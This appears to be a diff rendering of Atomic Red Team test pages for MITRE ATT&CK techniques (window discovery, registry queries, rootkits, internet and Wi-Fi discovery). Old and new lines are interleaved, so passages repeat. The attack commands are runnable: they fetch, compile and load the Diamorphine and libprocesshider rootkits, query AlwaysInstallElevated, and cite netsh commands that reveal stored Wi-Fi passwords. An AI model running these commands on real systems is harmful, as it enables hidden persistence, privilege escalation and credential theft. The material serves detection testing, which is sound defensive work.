Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
> Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
>
> Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
[Source](https://attack.mitre.org/techniques/T1010)
</blockquote>
## Atomic Tests
- [Atomic Test #1: List Process Main Windows - C# .NET](#atomic-test-1-list-process-main-windows---c-net)
- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
### Atomic Test #1: List Process Main Windows - C# .NET
<br/>
## Atomic Test #1 - List Process Main Windows - C# .NET
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4`
#### Inputs
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
| output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file_name} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{input_source_code}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{input_source_code}") -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
```
<br/>
atomics/T1012/T1012.md
+120 -32
View File
@@ -1,24 +1,31 @@
# T1012 - Query Registry
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
<blockquote>
## Description from ATT&CK
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
> Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
>
> The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
[Source](https://attack.mitre.org/techniques/T1012)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Query Registry](#atomic-test-1-query-registry)
- [Atomic Test #2: Query Registry with Powershell cmdlets](#atomic-test-2-query-registry-with-powershell-cmdlets)
- [Atomic Test #3: Enumerate COM Objects in Registry with Powershell](#atomic-test-3-enumerate-com-objects-in-registry-with-powershell)
- [Atomic Test #4: Reg query for AlwaysInstallElevated status](#atomic-test-4-reg-query-for-alwaysinstallelevated-status)
- [Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5-check-software-inventory-logging-sil-status-via-registry)
- [Atomic Test #6: Inspect SystemStartOptions Value in Registry](#atomic-test-6-inspect-systemstartoptions-value-in-registry)
- [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
### Atomic Test #1: Query Registry
- [Atomic Test #2 - Query Registry with Powershell cmdlets](#atomic-test-2---query-registry-with-powershell-cmdlets)
- [Atomic Test #3 - Enumerate COM Objects in Registry with Powershell](#atomic-test-3---enumerate-com-objects-in-registry-with-powershell)
- [Atomic Test #4 - Reg query for AlwaysInstallElevated status](#atomic-test-4---reg-query-for-alwaysinstallelevated-status)
- [Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5---check-software-inventory-logging-sil-status-via-registry)
- [Atomic Test #6 - Inspect SystemStartOptions Value in Registry](#atomic-test-6---inspect-systemstartoptions-value-in-registry)
<br/>
## Atomic Test #1 - Query Registry
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
@@ -29,9 +36,16 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
**auto_generated_guid:** `8f7578c4-9863-4d83-875c-a565573bbdf0`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -58,16 +72,30 @@ reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
```
### Atomic Test #2: Query Registry with Powershell cmdlets
<br/>
<br/>
## Atomic Test #2 - Query Registry with Powershell cmdlets
Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
**Supported Platforms:** Windows
**auto_generated_guid:** `0434d081-bb32-42ce-bcbb-3548e4f2628f`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 0434d081-bb32-42ce-bcbb-3548e4f2628f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -95,23 +123,36 @@ Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
```
### Atomic Test #3: Enumerate COM Objects in Registry with Powershell
<br/>
<br/>
## Atomic Test #3 - Enumerate COM Objects in Registry with Powershell
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
**Supported Platforms:** Windows
**auto_generated_guid:** `0d80d088-a84c-4353-af1a-fc8b439f1564`
#### Inputs
**auto_generated_guid:** 0d80d088-a84c-4353-af1a-fc8b439f1564
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | File to output list of COM objects to | string | $env:temp&#92;T1592.002Test1.txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
@@ -125,54 +166,101 @@ $handle | get-member -erroraction silentlycontinue | out-file #{output_file} -ap
$position += 1} catch{}}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
remove-item #{output_file} -force -erroraction silentlycontinue
remove-item $env:temp\clsids.txt -force -erroraction silentlycontinue
```
### Atomic Test #4: Reg query for AlwaysInstallElevated status
<br/>
<br/>
## Atomic Test #4 - Reg query for AlwaysInstallElevated status
The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.
**Supported Platforms:** Windows
**auto_generated_guid:** `6fb4c4c5-f949-4fd2-8af5-ddbc61595223`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6fb4c4c5-f949-4fd2-8af5-ddbc61595223
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
### Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry
<br/>
<br/>
## Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry
Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively
check for existence of software of interest to them. Status of SIL can be checked via registry.
[Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
**Supported Platforms:** Windows
**auto_generated_guid:** `5c784969-1d43-4ac7-8c3d-ed6d025ed10d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 5c784969-1d43-4ac7-8c3d-ed6d025ed10d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
```
### Atomic Test #6: Inspect SystemStartOptions Value in Registry
<br/>
<br/>
## Atomic Test #6 - Inspect SystemStartOptions Value in Registry
The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.
**Supported Platforms:** Windows
**auto_generated_guid:** `96257079-cdc1-4aba-8705-3146e94b6dce`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 96257079-cdc1-4aba-8705-3146e94b6dce
#### Attack Commands: Run with `command_prompt`!
```cmd
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
```
<br/>
atomics/T1014/T1014.md
+95 -63
View File
@@ -1,63 +1,70 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
<blockquote>
## Description from ATT&CK
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
>
> Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
>
> Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
[Source](https://attack.mitre.org/techniques/T1014)
Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Loadable Kernel Module based Rootkit](#atomic-test-1-loadable-kernel-module-based-rootkit)
- [Atomic Test #2: Loadable Kernel Module based Rootkit](#atomic-test-2-loadable-kernel-module-based-rootkit)
- [Atomic Test #3: dynamic-linker based rootkit (libprocesshider)](#atomic-test-3-dynamic-linker-based-rootkit-libprocesshider)
- [Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4-loadable-kernel-module-based-rootkit-diamorphine)
- [Atomic Test #1 - Loadable Kernel Module based Rootkit](#atomic-test-1---loadable-kernel-module-based-rootkit)
### Atomic Test #1: Loadable Kernel Module based Rootkit
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
<br/>
## Atomic Test #1 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** `dfb50072-e45a-4c75-a17e-a484809c8553`
#### Inputs
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
| rootkit_name | Module name | string | T1014|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
sudo apt install make
sudo apt install gcc
@@ -69,47 +76,54 @@ mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
```
### Atomic Test #2: Loadable Kernel Module based Rootkit
<br/>
<br/>
## Atomic Test #2 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** `75483ef8-f10f-444a-bf02-62eb0e48db6f`
#### Inputs
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_name | Module name | string | T1014|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo modprobe #{rootkit_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
sudo apt install make
sudo apt install gcc
@@ -121,48 +135,55 @@ sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
```
### Atomic Test #3: dynamic-linker based rootkit (libprocesshider)
<br/>
<br/>
## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
**Supported Platforms:** Linux
**auto_generated_guid:** `1338bf0c-fd0c-48c0-9e65-329f18e2c0d3`
#### Inputs
**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/|
| rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
| library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The preload library must exist on disk at specified location (#{library_path})
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
@@ -171,23 +192,34 @@ cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
```
### Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)
<br/>
<br/>
## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
Loads Diamorphine kernel module, which hides itself and a processes.
**Supported Platforms:** Linux
**auto_generated_guid:** `0b996469-48c6-46e2-8155-a17f8b6c2247`
#### Inputs
**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/|
| rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9|
| rootkit_name | Module name | string | diamorphine|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo modprobe #{rootkit_name}
@@ -197,8 +229,7 @@ kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
kill -63 1
sudo modprobe -r #{rootkit_name}
@@ -206,18 +237,15 @@ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
@@ -226,3 +254,7 @@ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
```
<br/>
atomics/T1016.001/T1016.001.md
+100 -30
View File
@@ -1,118 +1,188 @@
# T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
<blockquote>
## Description from ATT&CK
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
> Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
>
> Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
[Source](https://attack.mitre.org/techniques/T1016/001)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Check internet connection using ping Windows](#atomic-test-1-check-internet-connection-using-ping-windows)
- [Atomic Test #2: Check internet connection using ping freebsd, linux or macos](#atomic-test-2-check-internet-connection-using-ping-freebsd-linux-or-macos)
- [Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3-check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
- [Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4-check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
- [Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5-check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)
- [Atomic Test #1 - Check internet connection using ping Windows](#atomic-test-1---check-internet-connection-using-ping-windows)
### Atomic Test #1: Check internet connection using ping Windows
- [Atomic Test #2 - Check internet connection using ping freebsd, linux or macos](#atomic-test-2---check-internet-connection-using-ping-freebsd-linux-or-macos)
- [Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3---check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
- [Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4---check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
- [Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5---check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)
<br/>
## Atomic Test #1 - Check internet connection using ping Windows
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** Windows
**auto_generated_guid:** `e184b6bd-fb28-48aa-9a59-13012e33d7dc`
#### Inputs
**auto_generated_guid:** e184b6bd-fb28-48aa-9a59-13012e33d7dc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ping_target | target of the ping | url | 8.8.8.8|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
ping -n 4 #{ping_target}
```
### Atomic Test #2: Check internet connection using ping freebsd, linux or macos
<br/>
<br/>
## Atomic Test #2 - Check internet connection using ping freebsd, linux or macos
Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `be8f4019-d8b6-434c-a814-53123cdcc11e`
#### Inputs
**auto_generated_guid:** be8f4019-d8b6-434c-a814-53123cdcc11e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ping_target | target of the ping | url | 8.8.8.8|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`!
```bash
ping -c 4 #{ping_target}
```
### Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
<br/>
<br/>
## Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
**Supported Platforms:** Windows
**auto_generated_guid:** `f8160cde-4e16-4c8b-8450-6042d5363eb0`
#### Inputs
**auto_generated_guid:** f8160cde-4e16-4c8b-8450-6042d5363eb0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | 8.8.8.8|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -ComputerName #{target}
```
### Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
<br/>
<br/>
## Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `7c35779d-42ec-42ab-a283-6255b28e9d68`
#### Inputs
**auto_generated_guid:** 7c35779d-42ec-42ab-a283-6255b28e9d68
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | www.google.com|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}
```
### Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
<br/>
<br/>
## Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
**Supported Platforms:** Windows
**auto_generated_guid:** `d9c32b3b-7916-45ad-aca5-6c902da80319`
#### Inputs
**auto_generated_guid:** d9c32b3b-7916-45ad-aca5-6c902da80319
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target | target of the request | string | 8.8.8.8|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}
```
<br/>
atomics/T1016.002/T1016.002.md
+27 -11
View File
@@ -1,30 +1,46 @@
# T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
<blockquote>
## Description from ATT&CK
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
> Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
>
> Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
>
> On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
[Source](https://attack.mitre.org/techniques/T1016/002)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1-enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
- [Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1---enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
### Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
<br/>
